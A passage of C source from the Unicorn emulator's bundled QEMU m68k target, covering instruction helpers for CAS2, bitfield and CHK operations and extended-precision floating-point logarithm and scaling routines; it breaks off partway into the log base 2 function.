#endif { /* Tell the main loop we need to serialize this insn. */ cpu_loop_exit_atomic(env_cpu(env), ra); } } else { /* We're executing in a serial context -- no need to be atomic. 
*/ l1 = cpu_ldl_data_ra(env, a1, ra); l2 = cpu_ldl_data_ra(env, a2, ra); if (l1 == c1 && l2 == c2) { cpu_stl_data_ra(env, a1, u1, ra); cpu_stl_data_ra(env, a2, u2, ra); } } if (c1 != l1) { env->cc_n = l1; env->cc_v = c1; } else { env->cc_n = l2; env->cc_v = c2; } env->cc_op = CC_OP_CMPL; env->dregs[Dc1] = l1; env->dregs[Dc2] = l2; } void HELPER(cas2l)(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2) { do_cas2l(env, regs, a1, a2, false); } void HELPER(cas2l_parallel)(CPUM68KState *env, uint32_t regs, uint32_t a1, uint32_t a2) { do_cas2l(env, regs, a1, a2, true); } struct bf_data { uint32_t addr; uint32_t bofs; uint32_t blen; uint32_t len; }; static struct bf_data bf_prep(uint32_t addr, int32_t ofs, uint32_t len) { int bofs, blen; /* Bound length; map 0 to 32. */ len = ((len - 1) & 31) + 1; /* Note that ofs is signed. */ addr += ofs / 8; bofs = ofs % 8; if (bofs < 0) { bofs += 8; addr -= 1; } /* * Compute the number of bytes required (minus one) to * satisfy the bitfield. */ blen = (bofs + len - 1) / 8; /* * Canonicalize the bit offset for data loaded into a 64-bit big-endian * word. For the cases where BLEN is not a power of 2, adjust ADDR so * that we can use the next power of two sized load without crossing a * page boundary, unless the field itself crosses the boundary. */ switch (blen) { case 0: bofs += 56; break; case 1: bofs += 48; break; case 2: if (addr & 1) { bofs += 8; addr -= 1; } /* fallthru */ case 3: bofs += 32; break; case 4: if (addr & 3) { bofs += 8 * (addr & 3); addr &= -4; } break; default: g_assert_not_reached(); } return (struct bf_data){ .addr = addr, .bofs = bofs, .blen = blen, .len = len, }; } static uint64_t bf_load(CPUM68KState *env, uint32_t addr, int blen, uintptr_t ra) { switch (blen) { case 0: return cpu_ldub_data_ra(env, addr, ra); case 1: return cpu_lduw_data_ra(env, addr, ra); case 2: case 3: return cpu_ldl_data_ra(env, addr, ra); case 4: return cpu_ldq_data_ra(env, addr, ra); default: // g_assert_not_reached(); return 0; } } static void bf_store(CPUM68KState *env, uint32_t addr, int blen, uint64_t data, uintptr_t ra) { switch (blen) { case 0: cpu_stb_data_ra(env, addr, data, ra); break; case 1: cpu_stw_data_ra(env, addr, data, ra); break; case 2: case 3: cpu_stl_data_ra(env, addr, data, ra); break; case 4: cpu_stq_data_ra(env, addr, data, ra); break; default: g_assert_not_reached(); } } uint32_t HELPER(bfexts_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); return (int64_t)(data << d.bofs) >> (64 - d.len); } uint64_t HELPER(bfextu_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); /* * Put CC_N at the top of the high word; put the zero-extended value * at the bottom of the low word. 
*/ data <<= d.bofs; data >>= 64 - d.len; data |= data << (64 - d.len); return data; } uint32_t HELPER(bfins_mem)(CPUM68KState *env, uint32_t addr, uint32_t val, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif data = (data & ~mask) | (((uint64_t)val << (64 - d.len)) >> d.bofs); bf_store(env, d.addr, d.blen, data, ra); /* The field at the top of the word is also CC_N for CC_OP_LOGIC. */ return val << (32 - d.len); } uint32_t HELPER(bfchg_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif bf_store(env, d.addr, d.blen, data ^ mask, ra); return ((data & mask) << d.bofs) >> 32; } uint32_t HELPER(bfclr_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif bf_store(env, d.addr, d.blen, data & ~mask, ra); return ((data & mask) << d.bofs) >> 32; } uint32_t HELPER(bfset_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif bf_store(env, d.addr, d.blen, data | mask, ra); return ((data & mask) << d.bofs) >> 32; } uint32_t HELPER(bfffo_reg)(uint32_t n, uint32_t ofs, uint32_t len) { return (n ? clz32(n) : len) + ofs; } uint64_t HELPER(bfffo_mem)(CPUM68KState *env, uint32_t addr, int32_t ofs, uint32_t len) { uintptr_t ra = GETPC(); struct bf_data d = bf_prep(addr, ofs, len); uint64_t data = bf_load(env, d.addr, d.blen, ra); #ifdef _MSC_VER uint64_t mask = 0xffffffffffffffffULL << (64 - d.len) >> d.bofs; #else uint64_t mask = -1ull << (64 - d.len) >> d.bofs; #endif uint64_t n = (data & mask) << d.bofs; uint32_t ffo = helper_bfffo_reg(n >> 32, ofs, d.len); /* * Return FFO in the low word and N in the high word. * Note that because of MASK and the shift, the low word * is already zero. */ return n | ffo; } void HELPER(chk)(CPUM68KState *env, int32_t val, int32_t ub) { /* * From the specs: * X: Not affected, C,V,Z: Undefined, * N: Set if val < 0; cleared if val > ub, undefined otherwise * We implement here values found from a real MC68040: * X,V,Z: Not affected * N: Set if val < 0; cleared if val >= 0 * C: if 0 <= ub: set if val < 0 or val > ub, cleared otherwise * if 0 > ub: set if val > ub and val < 0, cleared otherwise */ env->cc_n = val; env->cc_c = 0 <= ub ? val < 0 || val > ub : val > ub && val < 0; if (val < 0 || val > ub) { CPUState *cs = env_cpu(env); /* Recover PC and CC_OP for the beginning of the insn. */ cpu_restore_state(cs, GETPC(), true); /* flags have been modified by gen_flush_flags() */ env->cc_op = CC_OP_FLAGS; /* Adjust PC to end of the insn. 
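* (HELPER(chk2) below adjusts by 4 instead.) */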
env->pc += 2;
        cs->exception_index = EXCP_CHK;
        cpu_loop_exit(cs);
    }
}

void HELPER(chk2)(CPUM68KState *env, int32_t val, int32_t lb, int32_t ub)
{
    /*
     * From the specs:
     *   X: Not affected, N,V: Undefined,
     *   Z: Set if val is equal to lb or ub
     *   C: Set if val < lb or val > ub, cleared otherwise
     * We implement here values found from a real MC68040:
     *   X,N,V: Not affected
     *   Z: Set if val is equal to lb or ub
     *   C: if lb <= ub: set if val < lb or val > ub, cleared otherwise
     *      if lb > ub: set if val > ub and val < lb, cleared otherwise
     */
    env->cc_z = val != lb && val != ub;
    env->cc_c = lb <= ub ? val < lb || val > ub : val > ub && val < lb;

    if (env->cc_c) {
        CPUState *cs = env_cpu(env);

        /* Recover PC and CC_OP for the beginning of the insn. */
        cpu_restore_state(cs, GETPC(), true);

        /* flags have been modified by gen_flush_flags() */
        env->cc_op = CC_OP_FLAGS;
        /* Adjust PC to end of the insn. */
        env->pc += 4;

        cs->exception_index = EXCP_CHK;
        cpu_loop_exit(cs);
    }
}

unicorn-2.1.1/qemu/target/m68k/qregs.def

DEFO32(PC, pc)
DEFO32(SR, sr)
DEFO32(CC_OP, cc_op)
DEFO32(CC_X, cc_x)
DEFO32(CC_C, cc_c)
DEFO32(CC_N, cc_n)
DEFO32(CC_V, cc_v)
DEFO32(CC_Z, cc_z)
DEFO32(MACSR, macsr)
DEFO32(MAC_MASK, mac_mask)

unicorn-2.1.1/qemu/target/m68k/softfloat.c

/*
 * Ported from a work by Andreas Grabher for Previous, NeXT Computer Emulator,
 * derived from NetBSD M68040 FPSP functions,
 * derived from release 2a of the SoftFloat IEC/IEEE Floating-point Arithmetic
 * Package. Those parts of the code (and some later contributions) are
 * provided under that license, as detailed below.
 * It has subsequently been modified by contributors to the QEMU Project,
 * so some portions are provided under:
 *  the SoftFloat-2a license
 *  the BSD license
 *  GPL-v2-or-later
 *
 * Any future contributions to this file will be taken to be licensed under
 * the Softfloat-2a license unless specifically indicated otherwise.
 */

/*
 * Portions of this work are licensed under the terms of the GNU GPL,
 * version 2 or later. See the COPYING file in the top-level directory.
*/ #include "qemu/osdep.h" #include "softfloat.h" #include "fpu/softfloat-macros.h" #include "softfloat_fpsp_tables.h" #define pi_exp 0x4000 #define piby2_exp 0x3FFF #define pi_sig UINT64_C(0xc90fdaa22168c235) static floatx80 propagateFloatx80NaNOneArg(floatx80 a, float_status *status) { if (floatx80_is_signaling_nan(a, status)) { float_raise(float_flag_invalid, status); a = floatx80_silence_nan(a, status); } if (status->default_nan_mode) { return floatx80_default_nan(status); } return a; } /* * Returns the modulo remainder of the extended double-precision floating-point * value `a' with respect to the corresponding value `b'. */ floatx80 floatx80_mod(floatx80 a, floatx80 b, float_status *status) { flag aSign, zSign; int32_t aExp, bExp, expDiff; uint64_t aSig0, aSig1, bSig; uint64_t qTemp, term0, term1; aSig0 = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); bSig = extractFloatx80Frac(b); bExp = extractFloatx80Exp(b); if (aExp == 0x7FFF) { if ((uint64_t) (aSig0 << 1) || ((bExp == 0x7FFF) && (uint64_t) (bSig << 1))) { return propagateFloatx80NaN(a, b, status); } goto invalid; } if (bExp == 0x7FFF) { if ((uint64_t) (bSig << 1)) { return propagateFloatx80NaN(a, b, status); } return a; } if (bExp == 0) { if (bSig == 0) { invalid: float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } normalizeFloatx80Subnormal(bSig, &bExp, &bSig); } if (aExp == 0) { if ((uint64_t) (aSig0 << 1) == 0) { return a; } normalizeFloatx80Subnormal(aSig0, &aExp, &aSig0); } bSig |= UINT64_C(0x8000000000000000); zSign = aSign; expDiff = aExp - bExp; aSig1 = 0; if (expDiff < 0) { return a; } qTemp = (bSig <= aSig0); if (qTemp) { aSig0 -= bSig; } expDiff -= 64; while (0 < expDiff) { qTemp = estimateDiv128To64(aSig0, aSig1, bSig); qTemp = (2 < qTemp) ? qTemp - 2 : 0; mul64To128(bSig, qTemp, &term0, &term1); sub128(aSig0, aSig1, term0, term1, &aSig0, &aSig1); shortShift128Left(aSig0, aSig1, 62, &aSig0, &aSig1); expDiff -= 62; } expDiff += 64; if (0 < expDiff) { qTemp = estimateDiv128To64(aSig0, aSig1, bSig); qTemp = (2 < qTemp) ? qTemp - 2 : 0; qTemp >>= 64 - expDiff; mul64To128(bSig, qTemp << (64 - expDiff), &term0, &term1); sub128(aSig0, aSig1, term0, term1, &aSig0, &aSig1); shortShift128Left(0, bSig, 64 - expDiff, &term0, &term1); while (le128(term0, term1, aSig0, aSig1)) { ++qTemp; sub128(aSig0, aSig1, term0, term1, &aSig0, &aSig1); } } return normalizeRoundAndPackFloatx80( 80, zSign, bExp + expDiff, aSig0, aSig1, status); } /* * Returns the mantissa of the extended double-precision floating-point * value `a'. */ floatx80 floatx80_getman(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a , status); } float_raise(float_flag_invalid , status); return floatx80_default_nan(status); } if (aExp == 0) { if (aSig == 0) { return packFloatx80(aSign, 0, 0); } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, 0x3FFF, aSig, 0, status); } /* * Returns the exponent of the extended double-precision floating-point * value `a' as an extended double-precision value. 
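* For example, 12.0 is stored as 1.5 * 2^3 (biased exponent 0x4002), so floatx80_getexp returns 3.0, while floatx80_getman above returns the mantissa 1.5.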
*/ floatx80 floatx80_getexp(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaNOneArg(a , status); } float_raise(float_flag_invalid , status); return floatx80_default_nan(status); } if (aExp == 0) { if (aSig == 0) { return packFloatx80(aSign, 0, 0); } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } return int32_to_floatx80(aExp - 0x3FFF, status); } /* * Scales extended double-precision floating-point value in operand `a' by * value `b'. The function truncates the value in the second operand 'b' to * an integral value and adds that value to the exponent of the operand 'a'. * The operation performed according to the IEC/IEEE Standard for Binary * Floating-Point Arithmetic. */ floatx80 floatx80_scale(floatx80 a, floatx80 b, float_status *status) { flag aSign, bSign; int32_t aExp, bExp, shiftCount; uint64_t aSig, bSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); bSig = extractFloatx80Frac(b); bExp = extractFloatx80Exp(b); bSign = extractFloatx80Sign(b); if (bExp == 0x7FFF) { if ((uint64_t) (bSig << 1) || ((aExp == 0x7FFF) && (uint64_t) (aSig << 1))) { return propagateFloatx80NaN(a, b, status); } float_raise(float_flag_invalid , status); return floatx80_default_nan(status); } if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { return propagateFloatx80NaN(a, b, status); } return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0) { if (aSig == 0) { return packFloatx80(aSign, 0, 0); } if (bExp < 0x3FFF) { return a; } normalizeFloatx80Subnormal(aSig, &aExp, &aSig); } if (bExp < 0x3FFF) { return a; } if (0x400F < bExp) { aExp = bSign ? -0x6001 : 0xE000; return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } shiftCount = 0x403E - bExp; bSig >>= shiftCount; aExp = bSign ? (aExp - bSig) : (aExp + bSig); return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } floatx80 floatx80_move(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t)(aSig << 1)) { return propagateFloatx80NaNOneArg(a, status); } return a; } if (aExp == 0) { if (aSig == 0) { return a; } normalizeRoundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } return roundAndPackFloatx80(status->floatx80_rounding_precision, aSign, aExp, aSig, 0, status); } /* * Algorithms for transcendental functions supported by MC68881 and MC68882 * mathematical coprocessors. The functions are derived from FPSP library. */ #define one_exp 0x3FFF #define one_sig UINT64_C(0x8000000000000000) /* * Function for compactifying extended double-precision floating point values. 
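* The 15-bit biased exponent lands in bits 30..16 and the top 16 mantissa bits in bits 15..0, so range tests such as compact >= 0x3FFF8000 (meaning |X| >= 1.0) reduce to a single integer comparison.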
*/ static int32_t floatx80_make_compact(int32_t aExp, uint64_t aSig) { return (aExp << 16) | (aSig >> 48); } /* * Log base e of x plus 1 */ floatx80 floatx80_lognp1(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig, fSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, j, k; floatx80 fp0, fp1, fp2, fp3, f, logof2, klog2, saveu; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } if (aExp == 0 && aSig == 0) { return packFloatx80(aSign, 0, 0); } if (aSign && aExp >= one_exp) { if (aExp == one_exp && aSig == one_sig) { float_raise(float_flag_divbyzero, status); return packFloatx80(aSign, floatx80_infinity.high, floatx80_infinity.low); } float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } if (aExp < 0x3f99 || (aExp == 0x3f99 && aSig == one_sig)) { /* <= min threshold */ float_raise(float_flag_inexact, status); return floatx80_move(a, status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); fp0 = a; /* Z */ fp1 = a; fp0 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* X = (1+Z) */ aExp = extractFloatx80Exp(fp0); aSig = extractFloatx80Frac(fp0); compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FFE8000 || compact > 0x3FFFC000) { /* |X| < 1/2 or |X| > 3/2 */ k = aExp - 0x3FFF; fp1 = int32_to_floatx80(k, status); fSig = (aSig & UINT64_C(0xFE00000000000000)) | UINT64_C(0x0100000000000000); j = (fSig >> 56) & 0x7E; /* DISPLACEMENT FOR 1/F */ f = packFloatx80(0, 0x3FFF, fSig); /* F */ fp0 = packFloatx80(0, 0x3FFF, aSig); /* Y */ fp0 = floatx80_sub(fp0, f, status); /* Y-F */ lp1cont1: /* LP1CONT1 */ fp0 = floatx80_mul(fp0, log_tbl[j], status); /* FP0 IS U = (Y-F)/F */ logof2 = packFloatx80(0, 0x3FFE, UINT64_C(0xB17217F7D1CF79AC)); klog2 = floatx80_mul(fp1, logof2, status); /* FP1 IS K*LOG2 */ fp2 = floatx80_mul(fp0, fp0, status); /* FP2 IS V=U*U */ fp3 = fp2; fp1 = fp2; fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x3FC2499AB5E4040B), status), status); /* V*A6 */ fp2 = floatx80_mul(fp2, float64_to_floatx80( make_float64(0xBFC555B5848CB7DB), status), status); /* V*A5 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FC99999987D8730), status), status); /* A4+V*A6 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFCFFFFFFF6F7E97), status), status); /* A3+V*A5 */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A4+V*A6) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A3+V*A5) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FD55555555555A4), status), status); /* A2+V*(A4+V*A6) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFE0000000000008), status), status); /* A1+V*(A3+V*A5) */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A2+V*(A4+V*A6)) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_mul(fp1, fp0, status); /* U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp2, status); /* U+V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_add(fp1, log_tbl[j + 1], status); /* LOG(F)+U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp1, 
status); /* FP0 IS LOG(F) + LOG(1+U) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, klog2, status); float_raise(float_flag_inexact, status); return a; } else if (compact < 0x3FFEF07D || compact > 0x3FFF8841) { /* |X| < 1/16 or |X| > -1/16 */ /* LP1CARE */ fSig = (aSig & UINT64_C(0xFE00000000000000)) | UINT64_C(0x0100000000000000); f = packFloatx80(0, 0x3FFF, fSig); /* F */ j = (fSig >> 56) & 0x7E; /* DISPLACEMENT FOR 1/F */ if (compact >= 0x3FFF8000) { /* 1+Z >= 1 */ /* KISZERO */ fp0 = floatx80_sub(float32_to_floatx80(make_float32(0x3F800000), status), f, status); /* 1-F */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS Y-F = (1-F)+Z */ fp1 = packFloatx80(0, 0, 0); /* K = 0 */ } else { /* KISNEG */ fp0 = floatx80_sub(float32_to_floatx80(make_float32(0x40000000), status), f, status); /* 2-F */ fp1 = floatx80_add(fp1, fp1, status); /* 2Z */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS Y-F = (2-F)+2Z */ fp1 = packFloatx80(1, one_exp, one_sig); /* K = -1 */ } goto lp1cont1; } else { /* LP1ONE16 */ fp1 = floatx80_add(fp1, fp1, status); /* FP1 IS 2Z */ fp0 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* FP0 IS 1+X */ /* LP1CONT2 */ fp1 = floatx80_div(fp1, fp0, status); /* U */ saveu = fp1; fp0 = floatx80_mul(fp1, fp1, status); /* FP0 IS V = U*U */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS W = V*V */ fp3 = float64_to_floatx80(make_float64(0x3F175496ADD7DAD6), status); /* B5 */ fp2 = float64_to_floatx80(make_float64(0x3F3C71C2FE80C7E0), status); /* B4 */ fp3 = floatx80_mul(fp3, fp1, status); /* W*B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* W*B4 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3F624924928BCCFF), status), status); /* B3+W*B5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F899999999995EC), status), status); /* B2+W*B4 */ fp1 = floatx80_mul(fp1, fp3, status); /* W*(B3+W*B5) */ fp2 = floatx80_mul(fp2, fp0, status); /* V*(B2+W*B4) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FB5555555555555), status), status); /* B1+W*(B3+W*B5) */ fp0 = floatx80_mul(fp0, saveu, status); /* FP0 IS U*V */ fp1 = floatx80_add(fp1, fp2, status); /* B1+W*(B3+W*B5) + V*(B2+W*B4) */ fp0 = floatx80_mul(fp0, fp1, status); /* U*V*([B1+W*(B3+W*B5)] + [V*(B2+W*B4)]) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, saveu, status); /*if (!floatx80_is_zero(a)) { */ float_raise(float_flag_inexact, status); /*} */ return a; } } /* * Log base e */ floatx80 floatx80_logn(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig, fSig; int8_t user_rnd_mode, user_rnd_prec; int32_t compact, j, k, adjk; floatx80 fp0, fp1, fp2, fp3, f, logof2, klog2, saveu; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign == 0) { return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } } adjk = 0; if (aExp == 0) { if (aSig == 0) { /* zero */ float_raise(float_flag_divbyzero, status); return packFloatx80(1, floatx80_infinity.high, floatx80_infinity.low); } if ((aSig & one_sig) == 0) { /* denormal */ normalizeFloatx80Subnormal(aSig, &aExp, &aSig); adjk = -100; aExp += 100; a = packFloatx80(aSign, aExp, aSig); } } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } user_rnd_mode = 
status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; compact = floatx80_make_compact(aExp, aSig); if (compact < 0x3FFEF07D || compact > 0x3FFF8841) { /* |X| < 15/16 or |X| > 17/16 */ k = aExp - 0x3FFF; k += adjk; fp1 = int32_to_floatx80(k, status); fSig = (aSig & UINT64_C(0xFE00000000000000)) | UINT64_C(0x0100000000000000); j = (fSig >> 56) & 0x7E; /* DISPLACEMENT FOR 1/F */ f = packFloatx80(0, 0x3FFF, fSig); /* F */ fp0 = packFloatx80(0, 0x3FFF, aSig); /* Y */ fp0 = floatx80_sub(fp0, f, status); /* Y-F */ /* LP1CONT1 */ fp0 = floatx80_mul(fp0, log_tbl[j], status); /* FP0 IS U = (Y-F)/F */ logof2 = packFloatx80(0, 0x3FFE, UINT64_C(0xB17217F7D1CF79AC)); klog2 = floatx80_mul(fp1, logof2, status); /* FP1 IS K*LOG2 */ fp2 = floatx80_mul(fp0, fp0, status); /* FP2 IS V=U*U */ fp3 = fp2; fp1 = fp2; fp1 = floatx80_mul(fp1, float64_to_floatx80( make_float64(0x3FC2499AB5E4040B), status), status); /* V*A6 */ fp2 = floatx80_mul(fp2, float64_to_floatx80( make_float64(0xBFC555B5848CB7DB), status), status); /* V*A5 */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FC99999987D8730), status), status); /* A4+V*A6 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFCFFFFFFF6F7E97), status), status); /* A3+V*A5 */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A4+V*A6) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A3+V*A5) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FD55555555555A4), status), status); /* A2+V*(A4+V*A6) */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0xBFE0000000000008), status), status); /* A1+V*(A3+V*A5) */ fp1 = floatx80_mul(fp1, fp3, status); /* V*(A2+V*(A4+V*A6)) */ fp2 = floatx80_mul(fp2, fp3, status); /* V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_mul(fp1, fp0, status); /* U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp2, status); /* U+V*(A1+V*(A3+V*A5)) */ fp1 = floatx80_add(fp1, log_tbl[j + 1], status); /* LOG(F)+U*V*(A2+V*(A4+V*A6)) */ fp0 = floatx80_add(fp0, fp1, status); /* FP0 IS LOG(F) + LOG(1+U) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, klog2, status); float_raise(float_flag_inexact, status); return a; } else { /* |X-1| >= 1/16 */ fp0 = a; fp1 = a; fp1 = floatx80_sub(fp1, float32_to_floatx80(make_float32(0x3F800000), status), status); /* FP1 IS X-1 */ fp0 = floatx80_add(fp0, float32_to_floatx80(make_float32(0x3F800000), status), status); /* FP0 IS X+1 */ fp1 = floatx80_add(fp1, fp1, status); /* FP1 IS 2(X-1) */ /* LP1CONT2 */ fp1 = floatx80_div(fp1, fp0, status); /* U */ saveu = fp1; fp0 = floatx80_mul(fp1, fp1, status); /* FP0 IS V = U*U */ fp1 = floatx80_mul(fp0, fp0, status); /* FP1 IS W = V*V */ fp3 = float64_to_floatx80(make_float64(0x3F175496ADD7DAD6), status); /* B5 */ fp2 = float64_to_floatx80(make_float64(0x3F3C71C2FE80C7E0), status); /* B4 */ fp3 = floatx80_mul(fp3, fp1, status); /* W*B5 */ fp2 = floatx80_mul(fp2, fp1, status); /* W*B4 */ fp3 = floatx80_add(fp3, float64_to_floatx80( make_float64(0x3F624924928BCCFF), status), status); /* B3+W*B5 */ fp2 = floatx80_add(fp2, float64_to_floatx80( make_float64(0x3F899999999995EC), status), status); /* B2+W*B4 */ fp1 = floatx80_mul(fp1, fp3, status); /* W*(B3+W*B5) */ fp2 = floatx80_mul(fp2, fp0, status); /* V*(B2+W*B4) */ fp1 = floatx80_add(fp1, float64_to_floatx80( make_float64(0x3FB5555555555555), status), status); /* B1+W*(B3+W*B5) */ fp0 = floatx80_mul(fp0, saveu, 
status); /* FP0 IS U*V */ fp1 = floatx80_add(fp1, fp2, status); /* B1+W*(B3+W*B5) + V*(B2+W*B4) */ fp0 = floatx80_mul(fp0, fp1, status); /* U*V*([B1+W*(B3+W*B5)] + [V*(B2+W*B4)]) */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_add(fp0, saveu, status); /*if (!floatx80_is_zero(a)) { */ float_raise(float_flag_inexact, status); /*} */ return a; } } /* * Log base 10 */ floatx80 floatx80_log10(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; floatx80 fp0, fp1; aSig = extractFloatx80Frac(a); aExp = extractFloatx80Exp(a); aSign = extractFloatx80Sign(a); if (aExp == 0x7FFF) { if ((uint64_t) (aSig << 1)) { propagateFloatx80NaNOneArg(a, status); } if (aSign == 0) { return packFloatx80(0, floatx80_infinity.high, floatx80_infinity.low); } } if (aExp == 0 && aSig == 0) { float_raise(float_flag_divbyzero, status); return packFloatx80(1, floatx80_infinity.high, floatx80_infinity.low); } if (aSign) { float_raise(float_flag_invalid, status); return floatx80_default_nan(status); } user_rnd_mode = status->float_rounding_mode; user_rnd_prec = status->floatx80_rounding_precision; status->float_rounding_mode = float_round_nearest_even; status->floatx80_rounding_precision = 80; fp0 = floatx80_logn(a, status); fp1 = packFloatx80(0, 0x3FFD, UINT64_C(0xDE5BD8A937287195)); /* INV_L10 */ status->float_rounding_mode = user_rnd_mode; status->floatx80_rounding_precision = user_rnd_prec; a = floatx80_mul(fp0, fp1, status); /* LOGN(X)*INV_L10 */ float_raise(float_flag_inexact, status); return a; } /* * Log base 2 */ floatx80 floatx80_log2(floatx80 a, float_status *status) { flag aSign; int32_t aExp; uint64_t aSig; int8_t user_rnd_mode, user_rnd_prec; floatx80 fp0, fp1; 